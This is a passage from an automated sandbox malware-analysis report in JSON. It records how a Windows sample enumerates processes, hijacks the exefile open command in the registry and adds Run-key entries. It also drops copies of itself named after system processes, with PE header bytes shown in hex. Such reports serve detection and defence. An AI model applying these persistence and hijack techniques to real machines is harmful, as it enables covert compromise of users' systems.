\"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"8\"\n \"th32ProcessID\": \"392\"}\n \"946b376a771cf97e6aa7e88de9157cf4794255c614bd946e2b53ae5b6c731d96.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"8\"\n \"th32ProcessID\": \"400\"}\n \"946b376a771cf97e6aa7e88de9157cf4794255c614bd946e2b53ae5b6c731d96.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"8\"\n \"th32ProcessID\": \"456\"}\n \"946b376a771cf97e6aa7e88de9157cf4794255c614bd946e2b53ae5b6c731d96.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"8\"\n \"th32ProcessID\": \"492\"}\n \"946b376a771cf97e6aa7e88de9157cf4794255c614bd946e2b53ae5b6c731d96.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"8\"\n \"th32ProcessID\": \"508\"}\n \"946b376a771cf97e6aa7e88de9157cf4794255c614bd946e2b53ae5b6c731d96.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"8\"\n \"th32ProcessID\": \"516\"}\n \"946b376a771cf97e6aa7e88de9157cf4794255c614bd946e2b53ae5b6c731d96.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"8\"\n \"th32ProcessID\": \"620\"}\n \"946b376a771cf97e6aa7e88de9157cf4794255c614bd946e2b53ae5b6c731d96.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"8\"\n \"th32ProcessID\": \"696\"}\n \"946b376a771cf97e6aa7e88de9157cf4794255c614bd946e2b53ae5b6c731d96.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"8\"\n \"th32ProcessID\": \"784\"}\n \"946b376a771cf97e6aa7e88de9157cf4794255c614bd946e2b53ae5b6c731d96.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"8\"\n \"th32ProcessID\": \"824\"}\n \"946b376a771cf97e6aa7e88de9157cf4794255c614bd946e2b53ae5b6c731d96.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"8\"\n \"th32ProcessID\": \"856\"}\n \"946b376a771cf97e6aa7e88de9157cf4794255c614bd946e2b53ae5b6c731d96.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"8\"\n \"th32ProcessID\": \"892\"}\n \"946b376a771cf97e6aa7e88de9157cf4794255c614bd946e2b53ae5b6c731d96.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"8\"\n \"th32ProcessID\": \"1124\"}\n \"946b376a771cf97e6aa7e88de9157cf4794255c614bd946e2b53ae5b6c731d96.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"8\"\n \"th32ProcessID\": \"1264\"}\n \"946b376a771cf97e6aa7e88de9157cf4794255c614bd946e2b53ae5b6c731d96.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"8\"\n \"th32ProcessID\": \"1316\"}\n \"946b376a771cf97e6aa7e88de9157cf4794255c614bd946e2b53ae5b6c731d96.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"8\"\n \"th32ProcessID\": \"1560\"}\n \"946b376a771cf97e6aa7e88de9157cf4794255c614bd946e2b53ae5b6c731d96.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"8\"\n \"th32ProcessID\": \"1620\"}\n \"946b376a771cf97e6aa7e88de9157cf4794255c614bd946e2b53ae5b6c731d96.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"8\"\n \"th32ProcessID\": \"1668\"}", "origin": "API Call", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057"}, {"threat_level_human": "informative", "category": "System Security", "identifier": "registry-159", "type": 3, "relevance": 1, "name": "Modifies windows command shell related registry path (UAC Bypass)", "description": "\"946b376a771cf97e6aa7e88de9157cf4794255c614bd946e2b53ae5b6c731d96.exe\" (Access type: \"SETVAL\"; Path: \"HKLM\\SOFTWARE\\CLASSES\\EXEFILE\\SHELL\\OPEN\\COMMAND\"; Key: \"(DEFAULT)\"; Value: \"\"%WINDIR%\\system32\\shell.exe\" \"%1\" %*\"), \"D3_08.exe\" (Access type: \"SETVAL\"; Path: \"HKLM\\SOFTWARE\\CLASSES\\EXEFILE\\SHELL\\OPEN\\COMMAND\"; Key: \"(DEFAULT)\"; Value: \"\"%WINDIR%\\system32\\shell.exe\" \"%1\" %*\"), \"IExplorer.exe\" (Access type: \"SETVAL\"; Path: \"HKLM\\SOFTWARE\\CLASSES\\EXEFILE\\SHELL\\OPEN\\COMMAND\"; Key: \"(DEFAULT)\"; Value: \"\"%WINDIR%\\system32\\shell.exe\" \"%1\" %*\"), \"WINLOGON.EXE\" (Access type: \"SETVAL\"; Path: \"HKLM\\SOFTWARE\\CLASSES\\EXEFILE\\SHELL\\OPEN\\COMMAND\"; Key: \"(DEFAULT)\"; Value: \"\"%WINDIR%\\system32\\shell.exe\" \"%1\" %*\"), \"CSRSS.EXE\" (Access type: \"SETVAL\"; Path: \"HKLM\\SOFTWARE\\CLASSES\\EXEFILE\\SHELL\\OPEN\\COMMAND\"; Key: \"(DEFAULT)\"; Value: \"\"%WINDIR%\\system32\\shell.exe\" \"%1\" %*\")", "origin": "Registry Access", "attck_id": "T1548.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1548/002"}, {"threat_level_human": "informative", "category": "System Security", "identifier": "registry-173", "type": 3, "relevance": 1, "name": "Queries services related registry keys", "description": "\"946b376a771cf97e6aa7e88de9157cf4794255c614bd946e2b53ae5b6c731d96.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\LDAP\"; Key: \"LDAPCLIENTINTEGRITY\"; Value: \"\")\n \"946b376a771cf97e6aa7e88de9157cf4794255c614bd946e2b53ae5b6c731d96.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\LDAP\"; Key: \"USEOLDHOSTRESOLUTIONORDER\"; Value: \"\")\n \"946b376a771cf97e6aa7e88de9157cf4794255c614bd946e2b53ae5b6c731d96.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\LDAP\"; Key: \"USEHOSTNAMEASALIAS\"; Value: \"\")\n \"946b376a771cf97e6aa7e88de9157cf4794255c614bd946e2b53ae5b6c731d96.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\LDAP\"; Key: \"IPV4LOOPBACKALTERNATIVE\"; Value: \"\")\n \"D3_08.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\LDAP\"; Key: \"LDAPCLIENTINTEGRITY\"; Value: \"\")\n \"D3_08.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\LDAP\"; Key: \"USEOLDHOSTRESOLUTIONORDER\"; Value: \"\")\n \"D3_08.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\LDAP\"; Key: \"USEHOSTNAMEASALIAS\"; Value: \"\")\n \"D3_08.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\LDAP\"; Key: \"IPV4LOOPBACKALTERNATIVE\"; Value: \"\")\n \"IExplorer.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\LDAP\"; Key: \"LDAPCLIENTINTEGRITY\"; Value: \"\")\n \"IExplorer.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\LDAP\"; Key: \"USEOLDHOSTRESOLUTIONORDER\"; Value: \"\")\n \"IExplorer.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\LDAP\"; Key: \"USEHOSTNAMEASALIAS\"; Value: \"\")\n \"IExplorer.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\LDAP\"; Key: \"IPV4LOOPBACKALTERNATIVE\"; Value: \"\")\n \"WINLOGON.EXE\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\LDAP\"; Key: \"LDAPCLIENTINTEGRITY\"; Value: \"\")\n \"WINLOGON.EXE\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\LDAP\"; Key: \"USEOLDHOSTRESOLUTIONORDER\"; Value: \"\")\n \"WINLOGON.EXE\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\LDAP\"; Key: \"USEHOSTNAMEASALIAS\"; Value: \"\")\n \"WINLOGON.EXE\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\LDAP\"; Key: \"IPV4LOOPBACKALTERNATIVE\"; Value: \"\")\n \"CSRSS.EXE\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\LDAP\"; Key: \"LDAPCLIENTINTEGRITY\"; Value: \"\")\n \"CSRSS.EXE\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\LDAP\"; Key: \"USEOLDHOSTRESOLUTIONORDER\"; Value: \"\")\n \"CSRSS.EXE\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\LDAP\"; Key: \"USEHOSTNAMEASALIAS\"; Value: \"\")\n \"CSRSS.EXE\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\LDAP\"; Key: \"IPV4LOOPBACKALTERNATIVE\"; Value: \"\")\n \"SERVICES.EXE\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\LDAP\"; Key: \"LDAPCLIENTINTEGRITY\"; Value: \"\")\n \"SERVICES.EXE\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\LDAP\"; Key: \"USEOLDHOSTRESOLUTIONORDER\"; Value: \"\")\n \"SERVICES.EXE\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\LDAP\"; Key: \"USEHOSTNAMEASALIAS\"; Value: \"\")\n \"SERVICES.EXE\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\LDAP\"; Key: \"IPV4LOOPBACKALTERNATIVE\"; Value: \"\")\n \"LSASS.EXE\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\LDAP\"; Key: \"LDAPCLIENTINTEGRITY\"; Value: \"\")", "origin": "Registry Access", "attck_id": "T1007", "attck_id_wiki": "https://attack.mitre.org/techniques/T1007"}, {"threat_level_human": "informative", "category": "System Security", "identifier": "api-37", "type": 6, "relevance": 10, "name": "Opens the Kernel Security Device Driver (KsecDD) of Windows", "description": "\"946b376a771cf97e6aa7e88de9157cf4794255c614bd946e2b53ae5b6c731d96.exe\" opened \"\\Device\\KsecDD\"\n \"D3_08.exe\" opened \"\\Device\\KsecDD\"\n \"IExplorer.exe\" opened \"\\Device\\KsecDD\"\n \"WINLOGON.EXE\" opened \"\\Device\\KsecDD\"\n \"CSRSS.EXE\" opened \"\\Device\\KsecDD\"\n \"SERVICES.EXE\" opened \"\\Device\\KsecDD\"\n \"LSASS.EXE\" opened \"\\Device\\KsecDD\"", "origin": "API Call"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "General", "identifier": "api-6", "type": 6, "relevance": 4, "name": "Reads configuration files (.ini files)", "description": "\"946b376a771cf97e6aa7e88de9157cf4794255c614bd946e2b53ae5b6c731d96.exe\" reads file \"C:\\Users\\desktop.ini\"\n \"946b376a771cf97e6aa7e88de9157cf4794255c614bd946e2b53ae5b6c731d96.exe\" reads file \"C:\\Users\\%OSUSER%\\Documents\\desktop.ini\"\n \"D3_08.exe\" reads file \"C:\\Users\\desktop.ini\"\n \"D3_08.exe\" reads file \"C:\\Users\\%OSUSER%\\Documents\\desktop.ini\"\n \"IExplorer.exe\" reads file \"C:\\Users\\desktop.ini\"\n \"IExplorer.exe\" reads file \"C:\\Users\\%OSUSER%\\Documents\\desktop.ini\"\n \"WINLOGON.EXE\" reads file \"C:\\Users\\desktop.ini\"\n \"WINLOGON.EXE\" reads file \"C:\\Users\\%OSUSER%\\Documents\\desktop.ini\"\n \"CSRSS.EXE\" reads file \"C:\\Users\\desktop.ini\"\n \"CSRSS.EXE\" reads file \"C:\\Users\\%OSUSER%\\Documents\\desktop.ini\"", "origin": "API Call", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Installation/Persistence", "identifier": "registry-0", "type": 3, "relevance": 8, "name": "Modifies auto-execute functionality by setting/creating a value in the registry", "description": "\"946b376a771cf97e6aa7e88de9157cf4794255c614bd946e2b53ae5b6c731d96.exe\" (Access type: \"CREATE\"; Path: \"HKCU\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN\\\")\n \"946b376a771cf97e6aa7e88de9157cf4794255c614bd946e2b53ae5b6c731d96.exe\" (Access type: \"SETVAL\"; Path: \"HKCU\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN\"; Key: \"D3_08\"; Value: \"%WINDIR%\\D3_08.exe\")\n \"946b376a771cf97e6aa7e88de9157cf4794255c614bd946e2b53ae5b6c731d96.exe\" (Access type: \"CREATE\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN\\\")\n \"946b376a771cf97e6aa7e88de9157cf4794255c614bd946e2b53ae5b6c731d96.exe\" (Access type: \"SETVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN\"; Key: \"LOGONHAPUBWS\"; Value: \"%APPDATA%\\WINDOWS\\CSRSS.EXE\")\n \"946b376a771cf97e6aa7e88de9157cf4794255c614bd946e2b53ae5b6c731d96.exe\" (Access type: \"SETVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN\"; Key: \"SYSTEM MONITORING\"; Value: \"%APPDATA%\\WINDOWS\\LSASS.EXE\")\n \"946b376a771cf97e6aa7e88de9157cf4794255c614bd946e2b53ae5b6c731d96.exe\" (Access type: \"SETVAL\"; Path: \"HKCU\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN\"; Key: \"MSMSGS\"; Value: \"%APPDATA%\\WINDOWS\\WINLOGON.EXE\")\n \"946b376a771cf97e6aa7e88de9157cf4794255c614bd946e2b53ae5b6c731d96.exe\" (Access type: \"SETVAL\"; Path: \"HKCU\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN\"; Key: \"SERVICEHAPUBWS\"; Value: \"%APPDATA%\\WINDOWS\\SERVICES.EXE\")\n \"D3_08.exe\" (Access type: \"CREATE\"; Path: \"HKCU\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN\\\")\n \"D3_08.exe\" (Access type: \"SETVAL\"; Path: \"HKCU\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN\"; Key: \"D3_08\"; Value: \"%WINDIR%\\D3_08.exe\")\n \"D3_08.exe\" (Access type: \"CREATE\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN\\\")\n \"D3_08.exe\" (Access type: \"SETVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN\"; Key: \"LOGONHAPUBWS\"; Value: \"%APPDATA%\\WINDOWS\\CSRSS.EXE\")", "origin": "Registry Access", "attck_id": "T1547.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1547/001"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Installation/Persistence", "identifier": "binary-1", "type": 8, "relevance": 10, "name": "Drops executable files", "description": "\"services.exe\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows\"- Location: [%LOCALAPPDATA%\\services.exe]- [targetUID: 00000000-00005136]\n \"D3_08.exe\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows\"- Location: [C:\\D3_08.exe]- [targetUID: 00000000-00005628]\n \"shell.exe\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows\"- Location: [%WINDIR%\\System32\\shell.exe]- [targetUID: 00000000-00005628]\n \"D3_08.exe\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows\"- Location: [%WINDIR%\\D3_08.exe]- [targetUID: 00000000-00005628]\n \"Data HAPUBWS.exe\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows\"- Location: [C:\\Data %OSUSER%.exe]- [targetUID: 00000000-00005404]\n \"Empty.pif\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows\"- Location: [%ALLUSERSPROFILE%\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\Empty.pif]- [targetUID: 00000000-00005628]\n \"New Folder.exe\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows\"- Location: [C:\\D3_08\\New Folder.exe]- [targetUID: 00000000-00005404]\n \"WINLOGON.EXE.bin\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows\"- [targetUID: N/A]\n \"CSRSS.EXE.bin\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows\"- [targetUID: N/A]\n \"SERVICES.EXE\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows\"- Location: [%LOCALAPPDATA%\\WINDOWS\\SERVICES.EXE]- [targetUID: 00000000-00005628]\n \"IEXPLORER.EXE.67EE4669.bin\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows\"- [targetUID: N/A]\n \"LSASS.EXE\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows\"- Location: [%LOCALAPPDATA%\\WINDOWS\\LSASS.EXE]- [targetUID: 00000000-00005628]\n \"IEXPLORER.EXE.67EE4994.bin\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows\"- [targetUID: N/A]\n \"MrD3_08.scr\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows\"- Location: [%WINDIR%\\System32\\MrD3_08.scr]- [targetUID: 00000000-00005628]\n \"D3_08.EXE.67EE4992.bin\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows\"- [targetUID: N/A]\n \"D3_08.EXE.67EE4667.bin\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows\"- [targetUID: N/A]\n \"lsass.exe\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows\"- Location: [%LOCALAPPDATA%\\lsass.exe]- [targetUID: 00000000-00005136]\n \"IExplorer.exe\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows\"- Location: [%LOCALAPPDATA%\\IExplorer.exe]- [targetUID: 00000000-00005628]\n \"winlogon.exe\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows\"- Location: [%LOCALAPPDATA%\\winlogon.exe]- [targetUID: 00000000-00005136]\n \"IExplorer.exe\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows\"- Location: [%WINDIR%\\System32\\IExplorer.exe]- [targetUID: 00000000-00005628]\n \"smss.exe\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows\"- Location: [%LOCALAPPDATA%\\smss.exe]- [targetUID: 00000000-00005136]\n \"D3_08.exe\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows\"- Location: [%LOCALAPPDATA%\\D3_08.exe]- [targetUID: 00000000-00005628]\n \"csrss.exe\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows\"- Location: [%LOCALAPPDATA%\\csrss.exe]- [targetUID: 00000000-00005136]\n \"SMSS.EXE\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows\"- Location: [%LOCALAPPDATA%\\WINDOWS\\SMSS.EXE]- [targetUID: 00000000-00005628]\n \"LSASS.EXE\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows\"- Location: [%LOCALAPPDATA%\\LSASS.EXE]- [targetUID: 00000000-00005628]\n \"SMSS.EXE\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows\"- Location: [%LOCALAPPDATA%\\SMSS.EXE]- [targetUID: 00000000-00005628]\n \"SERVICES.EXE\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows\"- Location: [%LOCALAPPDATA%\\SERVICES.EXE]- [targetUID: 00000000-00005628]\n \"WINLOGON.EXE\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows\"- Location: [%LOCALAPPDATA%\\WINDOWS\\WINLOGON.EXE]- [targetUID: 00000000-00005628]\n \"WINLOGON.EXE\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows\"- Location: [%LOCALAPPDATA%\\WINLOGON.EXE]- [targetUID: 00000000-00005628]\n \"CSRSS.EXE\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows\"- Location: [%LOCALAPPDATA%\\CSRSS.EXE]- [targetUID: 00000000-00005628]\n \"D3_08.EXE.67EE4B9C.bin\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows\"- [targetUID: N/A]\n \"CSRSS.EXE\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows\"- Location: [%LOCALAPPDATA%\\WINDOWS\\CSRSS.EXE]- [targetUID: 00000000-00005628]", "origin": "Binary File", "attck_id": "T1105", "attck_id_wiki": "https://attack.mitre.org/techniques/T1105"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Installation/Persistence", "identifier": "api-43", "type": 6, "relevance": 10, "name": "Writes a PE file header to disc", "description": "\"946b376a771cf97e6aa7e88de9157cf4794255c614bd946e2b53ae5b6c731d96.exe\" wrote 65536 bytes starting with PE header signature to file \"C:\\Users\\HAPUBWS\\AppData\\Local\\winlogon.exe\": 4d5a90000300000004000000ffff0000b800000000000000400000000000000000000000000000000000000000000000000000000000000000000000c80000000e1fba0e00b409cd21b8014ccd21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"946b376a771cf97e6aa7e88de9157cf4794255c614bd946e2b53ae5b6c731d96.exe\" wrote 46877 bytes starting with PE header signature to file \"C:\\Windows\\D3_08.exe\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"946b376a771cf97e6aa7e88de9157cf4794255c614bd946e2b53ae5b6c731d96.exe\" wrote 46822 bytes starting with PE header signature to file \"C:\\D3_08.exe\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"946b376a771cf97e6aa7e88de9157cf4794255c614bd946e2b53ae5b6c731d96.exe\" wrote 46897 bytes starting with PE header signature to file \"C:\\Windows\\System32\\shell.exe\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"946b376a771cf97e6aa7e88de9157cf4794255c614bd946e2b53ae5b6c731d96.exe\" wrote 46944 bytes starting with PE header signature to file \"C:\\Windows\\System32\\IExplorer.exe\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"946b376a771cf97e6aa7e88de9157cf4794255c614bd946e2b53ae5b6c731d96.exe\" wrote 46772 bytes starting with PE header signature to file \"C:\\Windows\\System32\\MrD3_08.scr\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"946b376a771cf97e6aa7e88de9157cf4794255c614bd946e2b53ae5b6c731d96.exe\" wrote 46913 bytes starting with PE header signature to file \"C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\Empty.pif\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"946b376a771cf97e6aa7e88de9157cf4794255c614bd946e2b53ae5b6c731d96.exe\" wrote 46838 bytes starting with PE header signature to file \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\WINLOGON.EXE\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"946b376a771cf97e6aa7e88de9157cf4794255c614bd946e2b53ae5b6c731d96.exe\" wrote 46835 bytes starting with PE header signature to file \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\CSRSS.EXE\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"946b376a771cf97e6aa7e88de9157cf4794255c614bd946e2b53ae5b6c731d96.exe\" wrote 46730 bytes starting with PE header signature to file \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\SERVICES.EXE\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"946b376a771cf97e6aa7e88de9157cf4794255c614bd946e2b53ae5b6c731d96.exe\" wrote 46848 bytes starting with PE header signature to file \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\LSASS.EXE\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"946b376a771cf97e6aa7e88de9157cf4794255c614bd946e2b53ae5b6c731d96.exe\" wrote 46818 bytes starting with PE header signature to file \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\SMSS.EXE\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"946b376a771cf97e6aa7e88de9157cf4794255c614bd946e2b53ae5b6c731d96.exe\" wrote 46818 bytes starting with PE header signature to file \"C:\\D3_08\\New Folder.exe\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"946b376a771cf97e6aa7e88de9157cf4794255c614bd946e2b53ae5b6c731d96.exe\" wrote 46974 bytes starting with PE header signature to file \"C:\\Data %OSUSER%.exe\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"946b376a771cf97e6aa7e88de9157cf4794255c614bd946e2b53ae5b6c731d96.exe\" wrote 46779 bytes starting with PE header signature to file \"C:\\Windows\\D3_08.exe\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"946b376a771cf97e6aa7e88de9157cf4794255c614bd946e2b53ae5b6c731d96.exe\" wrote 46856 bytes starting with PE header signature to file \"C:\\D3_08.exe\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"946b376a771cf97e6aa7e88de9157cf4794255c614bd946e2b53ae5b6c731d96.exe\" wrote 46966 bytes starting with PE header signature to file \"C:\\Windows\\System32\\shell.exe\": 